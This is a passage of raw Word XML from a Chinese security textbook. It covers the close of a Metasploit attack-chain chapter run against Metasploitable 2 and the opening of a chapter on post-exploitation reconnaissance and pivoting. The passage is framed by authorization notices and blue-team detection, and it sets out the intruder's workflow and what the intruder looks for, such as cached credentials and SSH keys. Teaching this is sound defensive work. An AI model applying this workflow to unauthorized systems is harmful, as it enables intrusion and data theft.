      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块，分别记录其名称和所针对的漏洞；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">③选择其中一个模块执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit，获得会话</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">session；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">④在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内执行至少三个信息收集命令并记录输出；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">⑤撰写一份简短的攻击链记录（包含模块选择理由、遇到的错误与解决方法、最终获得的信息摘要）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此迁移任务旨在帮助读者建立框架使用的肌肉记忆，并体验不同靶机环境下同一攻击链路的差异性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完整攻击链路是将侦察扫描、漏洞利用模块匹配、载荷配置、漏洞触发与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">getshell、基础后渗透五个阶段序列化整合的标准化流程。该链路本质上是通用攻击杀伤链的工程化实现，每一步都对应一个可以被蓝队检测的环节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的授权实操中，从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">建立目标信息库到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload，再到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并执行基础后渗透命令，形成了端到端的可复现教学演示。所有环境相关值（IP、端口、模块名、模块是否存在）必须标注为②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对称性是本节的核心立场：蓝队可在网络层（IDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的载荷特征匹配）、主机层（进程审计与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行为监控）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话层（异常外连与低慢通信检测）三个维度部署检测策略；蓝队的加固措施则聚焦于补丁管理（消除可利用漏洞）、网络分段（限制横向移动）以及最小权限原则（增加攻击链推进成本）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块在设计上服务于载荷格式适应（如坏字符规避），而非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AV/EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规避。本书严守武器化红线，不教授</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在此类场景中的武器化配置方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1175"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节展现的完整链路并非孤立的攻击操作，而是与后续章节紧密衔接的枢纽：后渗透操作将延伸到第18章的持久化与枢轴；防御检测将连接到卷五第19章的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIDS/EDR </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">体系；整体实战最终将汇聚于第22章的综合对抗推演。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Unleashed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（免费在线教材，OffSec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">维护）：涵盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从基础到高级的系统性教程，包括模块开发与自定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编写。建议在完成本节实操后通读其</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploitation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Post-Exploitation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kim, P.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Hacker Playbook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列：重点推荐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Practical Guide to Penetration Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分册中关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击链整合与实战流程的章节，提供了从渗透测试者视角出发的完整方法论。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bejtlich, R.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Practice of Network Security Monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：网络侧防御的经典教材。重点阅读关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通信模式检测与流量分析技术的章节，与本节防御对照框中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测策略互为补充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OffSec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PEN-200（PWK）课程教材：Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块化攻击链在认证渗透测试培训中的标准运用范例，其中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列靶机的实操流程与本节战术一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1176"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》第28章（TLS/防火墙/ACL）：回指本节防御框架中关于网络分段与边界防护的底层网络原理，作为蓝队架构加固的理论基础。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="311"/>
    <w:bookmarkEnd w:id="312"/>
    <w:bookmarkStart w:id="325" w:name="后渗透与权限维持原理与检测"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透与权限维持:原理与检测</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="313" w:name="后渗透信息收集与内网枢轴pivoting"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">18.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透信息收集与内网枢轴（pivoting）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【前置依赖框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节内容依赖以下前置知识：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第26章（IP协议、子网划分、路由表与NAT原理）：pivoting本质上是对IP路由模型的利用与延伸，读者应已理解子网间数据包转发的基本机制。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第27章（TCP状态机与连接跟踪）：内网横向移动产生的连接特征可从TCP状态机角度进行分析，读者应熟悉TCP三次握手、状态转换及连接跟踪机制。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第28章（防火墙与ACL）：网络分段的防御原理基于防火墙规则与访问控制列表，读者应已掌握基本的分段隔离概念。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书第17章（Metasploit框架与Meterpreter会话）：后渗透信息收集常借助Meterpreter等会话能力实现，读者应已了解会话建立的基本流程。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书第15章（Linux提权）、第16章（Windows提权与AD入门）：后渗透阶段的信息收集服务于提权与横向移动目标，读者应已建立基本的权限提升认知框架。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【授权与隔离声明框】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节讨论的后渗透信息收集与内网枢轴技术，仅限于读者在自建隔离实验室、官方授权靶机平台（如HackTheBox、TryHackMe、VulnHub、Metasploitable等）或获得书面授权的渗透测试目标上实践。实验网络必须与生产网络及公网物理隔离或通过专用VPN通道连接。用户在练习前必须创建虚拟机快照或备份，以便在误操作导致系统不稳定时回滚恢复。未经授权访问他人计算机系统属于违法行为，可能承担刑事责任。本节不提供任何可用于规避检测、绕过防火墙或入侵检测系统的武器化操作链。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透（Post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation）阶段的开端，攻击者面对一个核心问题：已经拿到了一台机器的shell，接下来该往哪里走？这就像一个人潜入了一栋建筑的某个房间，他现在需要弄清楚这栋建筑的布局、其他房间的位置、哪里有值钱的东西、以及如何到达那些区域。后渗透信息收集（Situational</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Awareness）与内网枢轴（Pivoting）正是回答这些问题的过程。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本章以蓝队检测视角贯穿始终：攻击者如何摸清内网环境，蓝队就如何发现这些异常行为。每一类攻击行为都对应一类可检测的信号，这正是"攻防对称"在本章的具体体现。本节先讲攻击者"能做什么"（原理层面，不给武器化操作），紧接着讲防御者"如何发现"（检测层面，可操作）。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 18.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后渗透信息收集：从立足点到态势感知</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**动机：攻击者视角**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者通过漏洞利用或钓鱼攻击获得了第一台内网主机的控制权，这个初始立足点（Initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Foothold）通常权限有限——可能只是普通用户级别的shell。攻击者的终极目标可能是：获取域控制器（Domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Controller, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DC）的最高权限、窃取数据库中的敏感数据、建立长期驻留（Persistence）等。要实现这些目标，攻击者首先需要回答以下问题：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当前主机在哪个网络段？有哪些网卡？可以访问哪些子网？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内网中还存活哪些主机？它们运行什么操作系统和什么服务？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">当前主机上有哪些用户？哪些用户属于高权限组？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否有缓存的凭据（Credentials）、保存的密码、SSH私钥？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否有到其他系统的信任关系（如SSH免密登录、NFS挂载、数据库链接）？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域环境（Active</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory）是否存在？域控制器在哪里？当前主机是否加入域？</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这些问题构成了后渗透信息收集的核心目标。这一过程在渗透测试术语中常被称为"态势感知"（Situational</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Awareness），其本质是构建被入侵网络的地图。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">**原理直觉**</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集的原理并不复杂。攻击者获得了一个壳，这个壳就是一个在操作系统上执行命令的入口。操作系统中存储着大量关于网络环境、用户配置、运行服务的元信息。攻击者只需要通过命令读取这些信息即可。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以Linux系统为例，网络接口信息存储在`/sbin/ifconfig`或`/sbin/ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
